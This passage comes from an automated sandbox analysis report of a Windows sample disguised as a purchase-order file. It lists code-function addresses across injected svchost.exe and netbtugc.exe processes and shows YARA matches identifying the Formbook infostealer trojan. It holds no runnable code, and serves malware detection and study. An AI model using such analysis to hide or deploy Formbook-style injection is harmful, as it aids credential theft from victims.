Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0014CAF0	0_2_0014CAF0
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0015CC39	0_2_0015CC39
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00176DD9	0_2_00176DD9
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0015B119	0_2_0015B119
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001491C0	0_2_001491C0
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00161394	0_2_00161394
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0016781B	0_2_0016781B
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00147920	0_2_00147920
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0015997D	0_2_0015997D
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00167A4A	0_2_00167A4A
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00167CA7	0_2_00167CA7
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_001CBE44	0_2_001CBE44
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00179EEE	0_2_00179EEE
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_0014BF40	0_2_0014BF40
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: 0_2_00F4DF50	0_2_00F4DF50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416871	2_2_00416871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416873	2_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004028A0	2_2_004028A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410173	2_2_00410173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401110	2_2_00401110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1F3	2_2_0040E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401290	2_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403500	2_2_00403500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040268A	2_2_0040268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402698	2_2_00402698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026A0	2_2_004026A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF4A	2_2_0040FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042D753	2_2_0042D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF53	2_2_0040FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035003E6	2_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C02C0	2_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430100	2_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F81CC	2_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F41A2	2_2_034F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035001AA	2_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464750	2_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C6E0	2_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03500591	2_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F2446	2_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4420	2_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EE4F6	2_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F6BD7	2_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350A9A6	2_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344A840	2_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E8F0	2_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034268B8	2_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03482F28	2_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460F30	2_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E2F30	2_2_034E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432FC8	2_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344CFE0	2_2_0344CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BEFA0	2_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440E59	2_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEE26	2_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEEDB	2_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452E90	2_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FCE93	2_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344AD00	2_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DCD1F	2_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343ADE0	2_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03458DBF	2_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440C00	2_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430CF2	2_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0CB5	2_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342D34C	2_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F132D	2_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0348739A	2_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B2C0	2_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E12ED	2_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034452A0	2_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347516C	2_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342F172	2_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350B16B	2_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344B1B0	2_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EF0CC	2_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034470C0	2_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F70E9	2_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF0E0	2_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF7B0	2_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485630	2_2_03485630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F16CC	2_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7571	2_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035095C3	2_2_035095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DD5B0	2_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03431460	2_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF43F	2_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFB76	2_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B5BF0	2_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347DBF9	2_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FB80	2_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFA49	2_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7A46	2_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B3A6C	2_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EDAC6	2_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DDAAC	2_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485AA0	2_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E1AA3	2_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449950	2_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B950	2_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D5910	2_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AD800	2_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034438E0	2_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFF09	2_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03403FD2	2_2_03403FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03403FD5	2_2_03403FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03441F92	2_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFFB1	2_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449EB0	2_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03443D40	2_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F1D5A	2_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7D73	2_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FDC0	2_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B9C32	2_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFCF2	2_2_034FFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B72000	4_2_00B72000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00BA01AA	4_2_00BA01AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B941A2	4_2_00B941A2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B981CC	4_2_00B981CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AD0100	4_2_00AD0100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B7A118	4_2_00B7A118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B68158	4_2_00B68158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B602C0	4_2_00B602C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B80274	4_2_00B80274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00BA03E6	4_2_00BA03E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AEE3F0	4_2_00AEE3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9A352	4_2_00B9A352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B8E4F6	4_2_00B8E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B84420	4_2_00B84420
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B92446	4_2_00B92446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00BA0591	4_2_00BA0591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE0535	4_2_00AE0535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AFC6E0	4_2_00AFC6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00ADC7C0	4_2_00ADC7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE0770	4_2_00AE0770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B04750	4_2_00B04750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AC68B8	4_2_00AC68B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B0E8F0	4_2_00B0E8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE2840	4_2_00AE2840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AEA840	4_2_00AEA840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE29A0	4_2_00AE29A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00BAA9A6	4_2_00BAA9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AF6962	4_2_00AF6962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00ADEA80	4_2_00ADEA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B96BD7	4_2_00B96BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9AB40	4_2_00B9AB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B80CB5	4_2_00B80CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AD0CF2	4_2_00AD0CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE0C00	4_2_00AE0C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AF8DBF	4_2_00AF8DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00ADADE0	4_2_00ADADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B7CD1F	4_2_00B7CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AEAD00	4_2_00AEAD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9CE93	4_2_00B9CE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AF2E90	4_2_00AF2E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9EEDB	4_2_00B9EEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9EE26	4_2_00B9EE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE0E59	4_2_00AE0E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B5EFA0	4_2_00B5EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AECFE0	4_2_00AECFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AD2FC8	4_2_00AD2FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B00F30	4_2_00B00F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B82F30	4_2_00B82F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B22F28	4_2_00B22F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B54F40	4_2_00B54F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B970E9	4_2_00B970E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9F0E0	4_2_00B9F0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE70C0	4_2_00AE70C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B8F0CC	4_2_00B8F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AEB1B0	4_2_00AEB1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00BAB16B	4_2_00BAB16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B1516C	4_2_00B1516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00ACF172	4_2_00ACF172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE52A0	4_2_00AE52A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B812ED	4_2_00B812ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AFB2C0	4_2_00AFB2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B2739A	4_2_00B2739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9132D	4_2_00B9132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00ACD34C	4_2_00ACD34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9F43F	4_2_00B9F43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AD1460	4_2_00AD1460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B7D5B0	4_2_00B7D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00BA95C3	4_2_00BA95C3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B97571	4_2_00B97571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B916CC	4_2_00B916CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B25630	4_2_00B25630
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9F7B0	4_2_00B9F7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE38E0	4_2_00AE38E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B4D800	4_2_00B4D800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B75910	4_2_00B75910
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE9950	4_2_00AE9950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AFB950	4_2_00AFB950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B25AA0	4_2_00B25AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B7DAAC	4_2_00B7DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B81AA3	4_2_00B81AA3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B8DAC6	4_2_00B8DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B53A6C	4_2_00B53A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9FA49	4_2_00B9FA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B97A46	4_2_00B97A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AFFB80	4_2_00AFFB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B55BF0	4_2_00B55BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B1DBF9	4_2_00B1DBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9FB76	4_2_00B9FB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9FCF2	4_2_00B9FCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B59C32	4_2_00B59C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AFFDC0	4_2_00AFFDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B97D73	4_2_00B97D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B91D5A	4_2_00B91D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE3D40	4_2_00AE3D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE9EB0	4_2_00AE9EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9FFB1	4_2_00B9FFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AE1F92	4_2_00AE1F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AA3FD2	4_2_00AA3FD2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00AA3FD5	4_2_00AA3FD5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00B9FF09	4_2_00B9FF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001D15E0	4_2_001D15E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001CC7D0	4_2_001CC7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001CC7C7	4_2_001CC7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001CC9F0	4_2_001CC9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001CAA70	4_2_001CAA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001D30F0	4_2_001D30F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001D30EE	4_2_001D30EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_001E9FD0	4_2_001E9FD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0099A0AF	4_2_0099A0AF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0099B8B4	4_2_0099B8B4
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0099B9D6	4_2_0099B9D6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0099ADD8	4_2_0099ADD8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0099BD6C	4_2_0099BD6C

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 105 times
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: String function: 00149CB3 appears 31 times
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: String function: 00160A30 appears 46 times
Source: C:\Users\user\Desktop\PO-DOC1522025-12.exe	Code function: String function: 0015F9F2 appears 40 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 00B15130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 00ACB970 appears 280 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 00B5F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 00B27E54 appears 111 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 00B4EA12 appears 86 times

Source: PO-DOC1522025-12.exe, 00000000.00000003.2145035552.0000000003B4D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO-DOC1522025-12.exe
Source: PO-DOC1522025-12.exe, 00000000.00000003.2145986490.00000000039A3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO-DOC1522025-12.exe

Source: PO-DOC1522025-12.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
